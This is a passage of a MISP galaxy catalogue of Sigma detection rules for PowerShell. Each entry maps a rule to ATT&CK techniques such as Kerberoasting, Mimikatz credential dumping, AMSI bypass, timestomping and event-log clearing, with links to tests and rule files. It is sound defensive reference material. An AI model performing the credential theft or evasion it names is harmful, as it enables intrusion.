  • related-to: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

Table 9731. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml

NTFS Alternate Data Stream

Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.

The tag is: misp-galaxy:sigma-rules="NTFS Alternate Data Stream"

NTFS Alternate Data Stream has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9732. Table References

Links

http://www.powertheshell.com/ntfsstreams/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_ntfs_ads_access.yml

Get-ADUser Enumeration Using UserAccountControl Flags

Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.

The tag is: misp-galaxy:sigma-rules="Get-ADUser Enumeration Using UserAccountControl Flags"

Get-ADUser Enumeration Using UserAccountControl Flags has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 9733. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting

https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml

Powershell Create Scheduled Task

Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code

The tag is: misp-galaxy:sigma-rules="Powershell Create Scheduled Task"

Powershell Create Scheduled Task has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 9734. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml

Powershell Timestomp

Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.

The tag is: misp-galaxy:sigma-rules="Powershell Timestomp"

Powershell Timestomp has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

Table 9735. Table References

Links

https://www.offensive-security.com/metasploit-unleashed/timestomp/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_timestomp.yml

PowerShell PSAttack

Detects the use of PSAttack PowerShell hack tool

The tag is: misp-galaxy:sigma-rules="PowerShell PSAttack"

PowerShell PSAttack has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9736. Table References

Links

https://adsecurity.org/?p=2921

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psattack.yml

Suspicious Hyper-V Cmdlets

Adversaries may carry out malicious operations using a virtual instance to avoid detection

The tag is: misp-galaxy:sigma-rules="Suspicious Hyper-V Cmdlets"

Suspicious Hyper-V Cmdlets has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Run Virtual Instance - T1564.006" with estimative-language:likelihood-probability="almost-certain"

Table 9737. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine

https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml

Service Registry Permissions Weakness Check

Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services

The tag is: misp-galaxy:sigma-rules="Service Registry Permissions Weakness Check"

Service Registry Permissions Weakness Check has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011" with estimative-language:likelihood-probability="almost-certain"

Table 9738. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml

Create Volume Shadow Copy with Powershell

Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information

The tag is: misp-galaxy:sigma-rules="Create Volume Shadow Copy with Powershell"

Create Volume Shadow Copy with Powershell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 9739. Table References

Links

https://attack.mitre.org/datasources/DS0005/

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml

Veeam Backup Servers Credential Dumping Script Execution

Detects execution of a PowerShell script that contains calls to the "Veeam.Backup" class, in order to dump stored credentials.

The tag is: misp-galaxy:sigma-rules="Veeam Backup Servers Credential Dumping Script Execution"

Table 9740. Table References

Links

https://www.pwndefend.com/2021/02/15/retrieving-passwords-from-veeam-backup-servers/

https://labs.withsecure.com/publications/fin7-target-veeam-servers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_veeam_credential_dumping_script.yml

Enable Windows Remote Management

Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.

The tag is: misp-galaxy:sigma-rules="Enable Windows Remote Management"

Enable Windows Remote Management has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"

Table 9741. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml

Suspicious PowerShell Mailbox SMTP Forward Rule

Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Mailbox SMTP Forward Rule"

Table 9742. Table References

Links

https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml

Suspicious Eventlog Clear

Detects usage of known powershell cmdlets such as "Clear-EventLog" to clear the Windows event logs

The tag is: misp-galaxy:sigma-rules="Suspicious Eventlog Clear"

Suspicious Eventlog Clear has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"

Table 9743. Table References

Links

https://twitter.com/oroneequalsone/status/1568432028361830402

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md

https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml

Suspicious Get Information for SMB Share

Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.

The tag is: misp-galaxy:sigma-rules="Suspicious Get Information for SMB Share"

Suspicious Get Information for SMB Share has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

Table 9744. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml

Suspicious FromBase64String Usage On Gzip Archive - Ps Script

Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.

The tag is: misp-galaxy:sigma-rules="Suspicious FromBase64String Usage On Gzip Archive - Ps Script"

Suspicious FromBase64String Usage On Gzip Archive - Ps Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

Table 9745. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_frombase64string_archive.yml

Malicious ShellIntel PowerShell Commandlets

Detects Commandlet names from ShellIntel exploitation scripts.

The tag is: misp-galaxy:sigma-rules="Malicious ShellIntel PowerShell Commandlets"

Malicious ShellIntel PowerShell Commandlets has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9746. Table References

Links

https://github.com/Shellntel/scripts/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml

WMIC Unquoted Services Path Lookup - PowerShell

Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts

The tag is: misp-galaxy:sigma-rules="WMIC Unquoted Services Path Lookup - PowerShell"

WMIC Unquoted Services Path Lookup - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 9747. Table References

Links

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py

https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml

Certificate Exported Via PowerShell - ScriptBlock

Detects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.

The tag is: misp-galaxy:sigma-rules="Certificate Exported Via PowerShell - ScriptBlock"

Certificate Exported Via PowerShell - ScriptBlock has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

Table 9748. Table References

Links

https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a

https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_export_certificate.yml

PowerShell Script Change Permission Via Set-Acl - PsScript

Detects PowerShell scripts set ACL to of a file or a folder

The tag is: misp-galaxy:sigma-rules="PowerShell Script Change Permission Via Set-Acl - PsScript"

PowerShell Script Change Permission Via Set-Acl - PsScript has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Permissions Modification - T1222" with estimative-language:likelihood-probability="almost-certain"

Table 9749. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_acl.yml

AMSI Bypass Pattern Assembly GetType

Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts

The tag is: misp-galaxy:sigma-rules="AMSI Bypass Pattern Assembly GetType"

AMSI Bypass Pattern Assembly GetType has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9750. Table References

Links

https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/

https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml

Suspicious Invoke-Item From Mount-DiskImage

Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.

The tag is: misp-galaxy:sigma-rules="Suspicious Invoke-Item From Mount-DiskImage"

Suspicious Invoke-Item From Mount-DiskImage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Mark-of-the-Web Bypass - T1553.005" with estimative-language:likelihood-probability="almost-certain"

Table 9751. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml

Security Software Discovery Via Powershell Script

Detects calls to "get-process" where the output is piped to a "where-object" filter to search for security solution processes. Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus

The tag is: misp-galaxy:sigma-rules="Security Software Discovery Via Powershell Script"

Security Software Discovery Via Powershell Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

Table 9752. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-2---security-software-discovery---powershell

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_process_security_software_discovery.yml

Powershell Local Email Collection

Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a users local system, such as Outlook storage or cache files.

The tag is: misp-galaxy:sigma-rules="Powershell Local Email Collection"

Powershell Local Email Collection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"

Table 9753. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mail_acces.yml

Suspicious PowerShell Get Current User

Detects the use of PowerShell to identify the current logged user.

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Get Current User"

Suspicious PowerShell Get Current User has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 9754. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml

User Discovery And Export Via Get-ADUser Cmdlet - PowerShell

Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file

The tag is: misp-galaxy:sigma-rules="User Discovery And Export Via Get-ADUser Cmdlet - PowerShell"

User Discovery And Export Via Get-ADUser Cmdlet - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 9755. Table References

Links

http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml

Winlogon Helper DLL

Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[Wow6432Node]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables.

The tag is: misp-galaxy:sigma-rules="Winlogon Helper DLL"

Winlogon Helper DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"

Table 9756. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml

Suspicious Service DACL Modification Via Set-Service Cmdlet - PS

Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"…​etc. (Works only in powershell 7)

The tag is: misp-galaxy:sigma-rules="Suspicious Service DACL Modification Via Set-Service Cmdlet - PS"

Suspicious Service DACL Modification Via Set-Service Cmdlet - PS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011" with estimative-language:likelihood-probability="almost-certain"

Table 9757. Table References

Links

https://twitter.com/Alh4zr3d/status/1580925761996828672

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml

Potential Invoke-Mimikatz PowerShell Script

Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.

The tag is: misp-galaxy:sigma-rules="Potential Invoke-Mimikatz PowerShell Script"

Potential Invoke-Mimikatz PowerShell Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 9758. Table References

Links

https://www.elastic.co/guide/en/security/current/potential-invoke-mimikatz-powershell-script.html#potential-invoke-mimikatz-powershell-script

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml

Troubleshooting Pack Cmdlet Execution

Detects execution of "TroubleshootingPack" cmdlets to leverage CVE-2022-30190 or action similar to "msdt" lolbin (as described in LOLBAS)

The tag is: misp-galaxy:sigma-rules="Troubleshooting Pack Cmdlet Execution"

Troubleshooting Pack Cmdlet Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 9759. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Msdt/

https://twitter.com/nas_bench/status/1537919885031772161

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml

Active Directory Computers Enumeration With Get-AdComputer

Detects usage of the "Get-AdComputer" to enumerate Computers or properties within Active Directory.

The tag is: misp-galaxy:sigma-rules="Active Directory Computers Enumeration With Get-AdComputer"

Active Directory Computers Enumeration With Get-AdComputer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

Table 9760. Table References

Links

https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md

https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1087.002/T1087.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adcomputer.yml

Detected Windows Software Discovery - PowerShell

Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.

The tag is: misp-galaxy:sigma-rules="Detected Windows Software Discovery - PowerShell"

Detected Windows Software Discovery - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"

Table 9761. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md

https://github.com/harleyQu1nn/AggressorScripts

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_software_discovery.yml

Invoke-Obfuscation Via Use Clip - Powershell

Detects Obfuscated Powershell via use Clip.exe in Scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use Clip - Powershell"

Invoke-Obfuscation Via Use Clip - Powershell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9762. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml

Suspicious Connection to Remote Account

Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism

The tag is: misp-galaxy:sigma-rules="Suspicious Connection to Remote Account"

Suspicious Connection to Remote Account has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"

Table 9763. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.001/T1110.001.md#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_networkcredential.yml

Suspicious Mount-DiskImage

Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.

The tag is: misp-galaxy:sigma-rules="Suspicious Mount-DiskImage"

Suspicious Mount-DiskImage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Mark-of-the-Web Bypass - T1553.005" with estimative-language:likelihood-probability="almost-certain"

Table 9764. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image

https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml

Potential Suspicious PowerShell Keywords

Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework

The tag is: misp-galaxy:sigma-rules="Potential Suspicious PowerShell Keywords"

Potential Suspicious PowerShell Keywords has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9765. Table References

Links

https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1

https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7

https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1

https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml

Recon Information for Export with PowerShell

Once established within a system or network, an adversary may use automated techniques for collecting internal data

The tag is: misp-galaxy:sigma-rules="Recon Information for Export with PowerShell"

Recon Information for Export with PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

Table 9766. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_recon_export.yml

Potential Suspicious Windows Feature Enabled

Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images

The tag is: misp-galaxy:sigma-rules="Potential Suspicious Windows Feature Enabled"

Table 9767. Table References

Links

https://learn.microsoft.com/en-us/windows/wsl/install-on-server

https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps

https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_susp_windows_optional_feature.yml

Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy

Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.

The tag is: misp-galaxy:sigma-rules="Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy"

Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"

Table 9768. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml

Suspicious Start-Process PassThru

Powershell use PassThru option to start in background

The tag is: misp-galaxy:sigma-rules="Suspicious Start-Process PassThru"

Suspicious Start-Process PassThru has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 9769. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml

Remove Account From Domain Admin Group

Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.

The tag is: misp-galaxy:sigma-rules="Remove Account From Domain Admin Group"

Remove Account From Domain Admin Group has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Access Removal - T1531" with estimative-language:likelihood-probability="almost-certain"

Table 9770. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml

PowerShell Deleted Mounted Share

Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation

